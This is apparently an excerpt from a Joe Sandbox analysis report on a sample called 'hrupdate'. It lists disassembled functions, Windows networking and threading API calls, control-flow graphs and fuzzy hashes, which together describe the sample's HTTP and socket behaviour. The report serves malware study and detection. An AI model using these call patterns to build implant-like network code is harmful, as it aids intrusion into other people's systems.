                                                                • HttpSendRequestA.WININET(00000000,?,?,04FC62C1,?), ref: 04FC61F1
                                                                • InternetCloseHandle.WININET(00000000), ref: 04FC620E
                                                                  • Part of subcall function 04FC99C6: _memset.LIBCMT ref: 04FC99D6
                                                                  • Part of subcall function 04FC99C6: _memset.LIBCMT ref: 04FC99E2
                                                                  • Part of subcall function 04FC99C6: __snprintf.LIBCMT ref: 04FC9A33
                                                                  • Part of subcall function 04FC99C6: _memset.LIBCMT ref: 04FC9A6A
                                                                  • Part of subcall function 04FC99C6: _memset.LIBCMT ref: 04FC9A75
                                                                  • Part of subcall function 04FC9A90: _memset.LIBCMT ref: 04FC9AA0
                                                                  • Part of subcall function 04FC9A90: _memset.LIBCMT ref: 04FC9AAC
                                                                  • Part of subcall function 04FC9A90: __snprintf.LIBCMT ref: 04FC9B08
                                                                  • Part of subcall function 04FC9A90: _memset.LIBCMT ref: 04FC9B26
                                                                  • Part of subcall function 04FC9A90: _memset.LIBCMT ref: 04FC9B31
                                                                • InternetQueryDataAvailable.WININET(00000000,04FC383D,00000000,00000000), ref: 04FC621F
                                                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 04FC624D
                                                                • InternetCloseHandle.WININET(00000000), ref: 04FC626D
                                                                • InternetCloseHandle.WININET(00000000), ref: 04FC628E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$Internet__snprintf$CloseHandle$HttpRequest$AvailableDataFileOpenQueryReadSend
                                                                • String ID:
                                                                • API String ID: 2172916581-0
                                                                • Opcode ID: 40e5e2bedabd578f53a482707598f6ce6131ed9bae6e962141338f684f271493
                                                                • Instruction ID: 24dd9080d454eebfc68367c3cfb1a6be6763d0ec59f1f06839ddb7ac193cbb7b
                                                                • Opcode Fuzzy Hash: 40e5e2bedabd578f53a482707598f6ce6131ed9bae6e962141338f684f271493
                                                                • Instruction Fuzzy Hash: 9E519BB2D0420ABFEF11AFA4ED84DEE7BBDEF04718F044469F514E3151DA35A9468B60
                                                                Function 04FC34E1 Relevance: 13.9, APIs: 9, Instructions: 415timeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 427 4fc34e1-4fc3603 call 4fcbf5f call 4fcc125 * 3 call 4fd020e call 4fd01dd call 4fd01e8 call 4fd020e * 2 call 4fcc125 * 2 call 4fd01dd call 4fcc125 call 4fd01e8 * 3 call 4fd01dd call 4fd0bb6 call 4fc970c call 4fd3b98 * 2 call 4fc6dcf 472 4fc360a-4fc361d call 4fd01e8 call 4fc6e12 427->472 473 4fc3605 call 4fd2f47 427->473 479 4fc361f call 4fd2f47 472->479 480 4fc3624-4fc362b call 4fc6e2d 472->480 473->472 479->480 484 4fc362d call 4fd2f47 480->484 485 4fc3632-4fc3639 call 4fc6eeb 480->485 484->485 489 4fc363b call 4fd2f47 485->489 490 4fc3640-4fc366e call 4fd01dd call 4fd01e8 call 4fdda1b 485->490 489->490 498 4fc3675-4fc36b9 call 4fd01e8 call 4fd3b98 call 4fd01e8 call 4fcbe03 call 4fd01e8 call 4fd3ddd 490->498 499 4fc3670 call 4fd2f47 490->499 513 4fc36db-4fc36ff call 4fd0866 * 3 498->513 514 4fc36bb-4fc36da GetLocalTime call 4fd01f3 498->514 499->498 523 4fc3705-4fc3724 GetLocalTime call 4fd01f3 513->523 524 4fc3701-4fc3703 513->524 514->513 525 4fc3725-4fc3748 call 4fd0866 * 2 523->525 524->523 524->525 532 4fc374a-4fc3752 525->532 533 4fc3754-4fc3773 GetLocalTime call 4fd01f3 525->533 532->533 534 4fc3774-4fc3785 call 4fc5b60 call 4fc8d58 532->534 533->534 541 4fc399c-4fc39aa call 4fc5b9d call 4fd2f47 534->541 542 4fc378b 534->542 543 4fc3792-4fc37f5 call 4fd0f91 call 4fddb76 * 3 call 4fc973c 542->543 558 4fc3815-4fc3844 call 4fc5c3f call 4fd01e8 call 4fc629c 543->558 559 4fc37f7-4fc37fc 543->559 571 4fc386c 558->571 572 4fc3846-4fc3853 call 4fcfb15 558->572 560 4fc37ff-4fc3804 559->560 560->560 562 4fc3806-4fc3808 560->562 562->558 565 4fc380a-4fc3814 call 4fc9b4c 562->565 565->558 574 4fc386e-4fc3872 571->574 575 4fc387a-4fc387d 571->575 579 4fc3874-4fc3877 572->579 581 4fc3855-4fc3864 call 4fce190 572->581 577 4fc3883-4fc3899 call 4fddc25 call 4fd1038 call 4fccd89 574->577 574->579 576 4fc3904 575->576 575->577 582 4fc3907-4fc3913 call 4fc5cc6 call 4fc6dcf 576->582 597 4fc389e-4fc38a8 call 4fd01e8 577->597 579->575 581->575 591 4fc3866-4fc3868 581->591 595 4fc391a-4fc392b call 4fd0fc1 582->595 596 4fc3915 call 4fd2f47 582->596 591->575 594 4fc386a 591->594 594->579 603 4fc392d call 4fd2f47 595->603 604 4fc3932-4fc3936 595->604 596->595 605 4fc38aa-4fc38af 597->605 606 4fc38b1 597->606 603->604 609 4fc394e-4fc3956 604->609 610 4fc3938-4fc394d call 4fddc25 call 4fd10c1 604->610 608 4fc38b6-4fc38cd call 4fc857b call 4fcb5f5 call 4fcab3d call 4fc6dcf 605->608 606->608 635 4fc38cf call 4fc6424 608->635 636 4fc38d4-4fc38db 608->636 609->541 611 4fc3958-4fc395f 609->611 610->609 614 4fc398a call 4fc8aae 611->614 615 4fc3961-4fc396f 611->615 626 4fc398f-4fc3996 614->626 618 4fc3971 call 4fc647c 615->618 619 4fc3982 615->619 629 4fc3976-4fc3980 618->629 625 4fc3984-4fc3986 619->625 625->614 630 4fc3988 625->630 626->541 631 4fc378d 626->631 629->625 630->614 631->543 635->636 636->582 638 4fc38dd-4fc3902 call 4fc5cc6 call 4fc5c3f call 4fc5db9 636->638 638->582
                                                                APIs
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                  • Part of subcall function 04FD0BB6: __time64.LIBCMT ref: 04FD0BC8
                                                                  • Part of subcall function 04FD0BB6: _malloc.LIBCMT ref: 04FD0C0F
                                                                  • Part of subcall function 04FD0BB6: _memset.LIBCMT ref: 04FD0C1C
                                                                  • Part of subcall function 04FD0BB6: _strtok.LIBCMT ref: 04FD0C36
                                                                  • Part of subcall function 04FC970C: __time64.LIBCMT ref: 04FC971D
                                                                  • Part of subcall function 04FD3B98: _malloc.LIBCMT ref: 04FD3BBF
                                                                  • Part of subcall function 04FD3B98: _memset.LIBCMT ref: 04FD3BED
                                                                  • Part of subcall function 04FD3B98: _realloc.LIBCMT ref: 04FD3BCE
                                                                • _malloc.LIBCMT ref: 04FC3661
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC36BF
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC3758
                                                                • __snprintf.LIBCMT ref: 04FC37AC
                                                                • __snprintf.LIBCMT ref: 04FC37BF
                                                                • __snprintf.LIBCMT ref: 04FC37E0
                                                                • __time64.LIBCMT ref: 04FC3884
                                                                • __time64.LIBCMT ref: 04FC3939
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC3709
                                                                  • Part of subcall function 04FD2F47: Sleep.KERNEL32(000003E8,00000080,00000000,00000000,?,?,04FC39A6), ref: 04FD2FAE
                                                                  • Part of subcall function 04FD2F47: RtlExitUserThread.NTDLL(00000000,00000080,00000000,00000000,?,?,04FC39A6), ref: 04FD2FE7
                                                                  • Part of subcall function 04FD2F47: WaitForSingleObject.KERNEL32(00000000,?,?,04FC39A6), ref: 04FD3003
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc$__time64$LocalTime__snprintf$_memset$ExitObjectSingleSleepThreadUserWait_realloc_strtok
                                                                • String ID:
                                                                • API String ID: 4021925118-0
                                                                • Opcode ID: 2a6053757d82f09bfc0108c82e6fd5de468b6f3fd153353462dda776b7188483
                                                                • Instruction ID: e7487141a1a985bcdd5abe58c8475f5e811d8290c38aa1b669745ad34188ae36
                                                                • Opcode Fuzzy Hash: 2a6053757d82f09bfc0108c82e6fd5de468b6f3fd153353462dda776b7188483
                                                                • Instruction Fuzzy Hash: 4BD10672D40316AAFF247FB0AE05B6E7BA6AF04358F18441DFD04AA1C0DE79F5438A65
                                                                Function 04FCBE03 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetACP.KERNEL32(00000080,00000000,00000000,?,?,?,?,?,?,?,?,04FC369C,00000000,00000000), ref: 04FCBE0C
                                                                • GetOEMCP.KERNEL32(?,?,?,?,?,?,?,?,04FC369C,00000000,00000000), ref: 04FCBE18
                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04FC369C,00000000), ref: 04FCBE45
                                                                • GetTickCount.KERNEL32 ref: 04FCBE49
                                                                  • Part of subcall function 04FDDFA9: __getptd.LIBCMT ref: 04FDDFAE
                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04FC369C,00000000), ref: 04FCBE76
                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,04FC369C,00000000), ref: 04FCBEDC
                                                                • _memset.LIBCMT ref: 04FCBF13
                                                                • _memset.LIBCMT ref: 04FCBF52
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcess$_memset$CountTick__getptd
                                                                • String ID:
                                                                • API String ID: 3908538216-0
                                                                • Opcode ID: 12e56e0691da8eb54208064541addb7a88c2afbb341588d1a3ed4a3b05f399f1
                                                                • Instruction ID: 14e0e80b43996d093842670950e7ffacc919c6332b67b2adac3d5d589eda139e
                                                                • Opcode Fuzzy Hash: 12e56e0691da8eb54208064541addb7a88c2afbb341588d1a3ed4a3b05f399f1
                                                                • Instruction Fuzzy Hash: 9A31D772800209BBFB107BB4FD49E9E3F69AF44268F14542AF904AB0C1DE78F9468661
                                                                Function 00B01A20 Relevance: 12.1, APIs: 8, Instructions: 74timewindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E8), ref: 00B01A52
                                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00B01A64
                                                                • KillTimer.USER32(?,00000001), ref: 00B01A72
                                                                • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 00B01A7B
                                                                • DialogBoxParamW.USER32(00000081,?,00B01B00,00000000), ref: 00B01A94
                                                                • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 00B01ACE
                                                                • EndDialog.USER32(?,00000000), ref: 00B01AE4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: DialogTimer$CallbackDispatcherItemKillMessageParamSendUser
                                                                • String ID:
                                                                • API String ID: 182125530-0
                                                                • Opcode ID: b2359a15b997e3a0697e179e49e715babca285d70a5f3fbcda05ccb043cdd9e5
                                                                • Instruction ID: d453b91f83aa68aaba0f58fb0e0a63c33e3d8716849ffa61ffc6bceb5a763678
                                                                • Opcode Fuzzy Hash: b2359a15b997e3a0697e179e49e715babca285d70a5f3fbcda05ccb043cdd9e5
                                                                • Instruction Fuzzy Hash: 3511A77338020477E6111B5CFC49FDA7F58DB75762F004422F305FA0E1DBE1A8929694
                                                                Function 00B01900 Relevance: 10.6, APIs: 7, Instructions: 97windowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00B0193E
                                                                • DefWindowProcW.USER32(?,00000111,?,?), ref: 00B01970
                                                                • BeginPaint.USER32(?,?), ref: 00B019D3
                                                                • EndPaint.USER32(?,?), ref: 00B019DF
                                                                • PostQuitMessage.USER32(00000000), ref: 00B019FB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                • String ID:
                                                                • API String ID: 3181456275-0
                                                                • Opcode ID: 5f45f1b67c9da7f006a287c6bf44843e9d858ab5d557d8294fbb4e0ec81d2438
                                                                • Instruction ID: 53d8f9b4a4d1e62b738631b4455a27a1ca68bb859deb7849cde80f48b947863e
                                                                • Opcode Fuzzy Hash: 5f45f1b67c9da7f006a287c6bf44843e9d858ab5d557d8294fbb4e0ec81d2438
                                                                • Instruction Fuzzy Hash: 8521D4722141089BC614EF68AC1AAEB7FE8EF5D311F404A5AFA46D71D0EF619820C7D2
                                                                Function 00B02B00 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • _Mtx_lock.MSVCP140(?,21DC2236,?,?,?,?,00B03EB0,000000FF), ref: 00B02B3B
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B02B4F
                                                                • _Cnd_signal.MSVCP140 ref: 00B02B5B
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,00000000), ref: 00B02B69
                                                                • _Mtx_unlock.MSVCP140(00000000,00000000), ref: 00B02B71
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B02B7F
                                                                • _Cnd_do_broadcast_at_thread_exit.MSVCP140 ref: 00B02B8B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: C_error@std@@Throw_$Cnd_do_broadcast_at_thread_exitCnd_signalMtx_lockMtx_unlock
                                                                • String ID:
                                                                • API String ID: 35399794-0
                                                                • Opcode ID: 52d20cc4d4e4d00ea002de10b6dc254882b1b3298ad11cd9296fac153cf2a61b
                                                                • Instruction ID: c0d3ee8f2abca9d1d3948123848b6a390c7d0362f9d8153a1b42c27a5ea84ae4
                                                                • Opcode Fuzzy Hash: 52d20cc4d4e4d00ea002de10b6dc254882b1b3298ad11cd9296fac153cf2a61b
                                                                • Instruction Fuzzy Hash: 021198B1900604ABD7015F55EC09B4BBBE8FB04724F044675EE05A3790EB39E928C6E5
                                                                Function 04FCCC39 Relevance: 9.1, APIs: 6, Instructions: 113networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 741 4fccc39-4fccc56 742 4fccc68-4fccc6a 741->742 743 4fccc58-4fccc5d call 4fdda1b 741->743 745 4fccc70 742->745 746 4fccd81-4fccd88 742->746 748 4fccc62-4fccc63 743->748 747 4fccc75-4fccc79 745->747 749 4fccc7f-4fccc87 747->749 750 4fccd76-4fccd7b 747->750 748->742 751 4fccc89-4fcccc1 htonl recvfrom 749->751 752 4fcccf6-4fccd18 htonl ioctlsocket 749->752 750->746 750->747 753 4fcccda-4fcccdc 751->753 754 4fcccc3-4fcccce WSAGetLastError 751->754 755 4fccd1d-4fccd20 752->755 756 4fccd1a 752->756 753->750 758 4fccce2-4fcccf4 753->758 754->750 757 4fcccd4-4fcccd8 754->757 759 4fccd42-4fccd43 755->759 760 4fccd22-4fccd26 755->760 756->755 761 4fccd44-4fccd56 call 4fc3495 757->761 762 4fccd6b-4fccd73 call 4fc3495 758->762 759->761 760->750 763 4fccd28-4fccd40 call 4fcc2bc 760->763 761->750 762->750 763->759 770 4fccd58-4fccd5d 763->770 770->750 771 4fccd5f-4fccd65 770->771 771->762
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FCCC5D
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • htonl.WS2_32(6083960B), ref: 04FCCC89
                                                                • recvfrom.WS2_32(?,B0C25DAC,000FFFFC,00000000,?,?), ref: 04FCCCB8
                                                                • WSAGetLastError.WS2_32 ref: 04FCCCC3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: AllocateErrorHeapLast_mallochtonlrecvfrom
                                                                • String ID:
                                                                • API String ID: 987280018-0
                                                                • Opcode ID: 7e1490a240a7802738e65aa502ac1be26c7c42dc1a49b056b2dbd77ae1c1bc55
                                                                • Instruction ID: 6a2a94e3ad66d46b3ae6390f30c73514121623468f39b4fb5c6e84050bea5e1a
                                                                • Opcode Fuzzy Hash: 7e1490a240a7802738e65aa502ac1be26c7c42dc1a49b056b2dbd77ae1c1bc55
                                                                • Instruction Fuzzy Hash: 8E41D072D00686AFE7218FA4DA45A6E7BB5EB05325F20452EF525A71E1E770AD03AB00
                                                                Function 00B02DCF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 772 b02dcf-b02dd2 773 b02de1-b02dec malloc 772->773 774 b02dd4-b02ddf _callnewh 773->774 775 b02dee-b02def 773->775 774->773 776 b02df0-b02df4 774->776 777 b03292-b032b4 call b031f3 _CxxThrowException 776->777 778 b02dfa-b03291 call b031c0 _CxxThrowException 776->778 784 b032b6 777->784 785 b032bb 777->785 778->777 784->785
                                                                APIs
                                                                • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00B027F7,00000000,00000000,?,?,?,00000000), ref: 00B02DD7
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00B027F7,00000000,00000000,?,?,?,00000000), ref: 00B02DE4
                                                                • _CxxThrowException.VCRUNTIME140(00000000,00B04C5C,00000000), ref: 00B0328C
                                                                • _CxxThrowException.VCRUNTIME140(00000000,00B04CB0,00000000), ref: 00B032A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$_callnewhmalloc
                                                                • String ID: Unknown exception
                                                                • API String ID: 4113974480-410509341
                                                                • Opcode ID: 29c0cda21983972cb9874066b592c86764488ca7b9b884476350f2a4c48810b2
                                                                • Instruction ID: df4402fc99c1837a2d9bb139a16e6131f2408751e3049d722872090adf4451a7
                                                                • Opcode Fuzzy Hash: 29c0cda21983972cb9874066b592c86764488ca7b9b884476350f2a4c48810b2
                                                                • Instruction Fuzzy Hash: 27F0C274A0060DB7CF04B7E5E84EA5E7FECDE00B50B6482F4B925920E1EB71EB4985C0
                                                                Function 04FC6388 Relevance: 4.6, APIs: 3, Instructions: 68networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 04FC62DB: WSAStartup.WS2_32(00000202,?), ref: 04FC62FC
                                                                  • Part of subcall function 04FC62DB: WSACleanup.WS2_32 ref: 04FC6306
                                                                • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 04FC63AC
                                                                • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,00000001,00000000,00000000), ref: 04FC63D7
                                                                • closesocket.WS2_32(00000000), ref: 04FC6416
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CleanupIoctlSocketStartupclosesocket
                                                                • String ID:
                                                                • API String ID: 1100289767-0
                                                                • Opcode ID: b07ee390d600fd449390e62d91f807ab846da2dafb804c40f2f2b5a799255852
                                                                • Instruction ID: ba40fe44940622cc241cda092b3802e6c2e146c7b941ced6319fa6e3f74d6ea2
                                                                • Opcode Fuzzy Hash: b07ee390d600fd449390e62d91f807ab846da2dafb804c40f2f2b5a799255852
                                                                • Instruction Fuzzy Hash: A111E771B041297FF7208E65DD88FEB7FADDF84760F004069F605C2181D634984286A0
                                                                Function 04FC5BC4 Relevance: 3.1, APIs: 2, Instructions: 54networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetSetOptionA.WININET(00000000,00000005,0003A980,00000004), ref: 04FC5C21
                                                                • InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 04FC5C31
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: InternetOption
                                                                • String ID:
                                                                • API String ID: 3327645240-0
                                                                • Opcode ID: c071940ebe5c8b0f7555f5e3c5821549d6d79c59c96757adb3d4149d7eac7ff3
                                                                • Instruction ID: 41d41ccb2931421fb1be70a4890945bf8a0c6c36801b5df4ee9d2d06ee6dbd0b
                                                                • Opcode Fuzzy Hash: c071940ebe5c8b0f7555f5e3c5821549d6d79c59c96757adb3d4149d7eac7ff3
                                                                • Instruction Fuzzy Hash: E001DB61E5173DBAEA319B70AE0AFFA7E5CDB00B54F401019F600A70C0D9B4FA42D6D0
                                                                Function 04FC8DA9 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc_memset
                                                                • String ID:
                                                                • API String ID: 4137368368-0
                                                                • Opcode ID: 44c70397971aacc1e29a062b2104901ab0c525a298335cef8def32f3048be67f
                                                                • Instruction ID: 690a606da2e5f5028d47de17ecc80edce469daec2e69c6e9cef829634fbae73e
                                                                • Opcode Fuzzy Hash: 44c70397971aacc1e29a062b2104901ab0c525a298335cef8def32f3048be67f
                                                                • Instruction Fuzzy Hash: A201C0719006059FE320BF64ED01B5B3BE4EB56799F00452EE84AA7201EB35F403CF91
                                                                Function 04FC5C3F Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 04FC5BC4: InternetSetOptionA.WININET(00000000,00000005,0003A980,00000004), ref: 04FC5C21
                                                                  • Part of subcall function 04FC5BC4: InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 04FC5C31
                                                                • InternetSetOptionA.WININET(00000000,0000002B,00000000,00000000), ref: 04FC5CA1
                                                                • InternetSetOptionA.WININET(0000002C,00000000,00000000), ref: 04FC5CBD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: InternetOption
                                                                • String ID:
                                                                • API String ID: 3327645240-0
                                                                • Opcode ID: 8adcfc63c76cf3dc1a865cfa6544b50dc9ce5b5a0f992eafb0508ee16e71068c
                                                                • Instruction ID: a4b20cfbf89e73507b038dc5e397a68643cf5f97f0e196604b49e796496d7a2c
                                                                • Opcode Fuzzy Hash: 8adcfc63c76cf3dc1a865cfa6544b50dc9ce5b5a0f992eafb0508ee16e71068c
                                                                • Instruction Fuzzy Hash: 0E0186729413257EFA307F74AD05F593B49DB00B69F14541AFE006A1D1CD79F8834A94
                                                                Function 030DC085 Relevance: 3.0, APIs: 2, Instructions: 45memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • HeapCreate.KERNEL32(00040000,00000000,00000000,?,00000004,?), ref: 030DC0A3
                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 030DC0B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_30d0000_hrupdate.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateCreate
                                                                • String ID:
                                                                • API String ID: 2875408731-0
                                                                • Opcode ID: a1d591106e10ad5d9a199ab925d8206d06663360d4494dab4b31c1a7f6544c4c
                                                                • Instruction ID: bd44e0d39c3bb3f05f0b3ebeddbb53e393fec294f036436bc5199bfaa5c12aaa
                                                                • Opcode Fuzzy Hash: a1d591106e10ad5d9a199ab925d8206d06663360d4494dab4b31c1a7f6544c4c
                                                                • Instruction Fuzzy Hash: BC1143B8A00209AFDB04CF44D496B9ABBB1FB58354F1081A9ED089B391D771A995CFD0
                                                                Function 04FCCD89 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 04FCC902: htonl.WS2_32(04FC389E), ref: 04FCC93C
                                                                  • Part of subcall function 04FCC902: select.WS2_32(00000000,?,?,?,?), ref: 04FCC9A0
                                                                  • Part of subcall function 04FCC902: __WSAFDIsSet.WS2_32(34E85900,?), ref: 04FCC9BC
                                                                  • Part of subcall function 04FCC902: accept.WS2_32(34E85900,00000000,00000000), ref: 04FCC9D1
                                                                  • Part of subcall function 04FCC902: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 04FCC9E4
                                                                • GetTickCount.KERNEL32 ref: 04FCCD97
                                                                  • Part of subcall function 04FCCC39: _malloc.LIBCMT ref: 04FCCC5D
                                                                  • Part of subcall function 04FCCC39: htonl.WS2_32(6083960B), ref: 04FCCC89
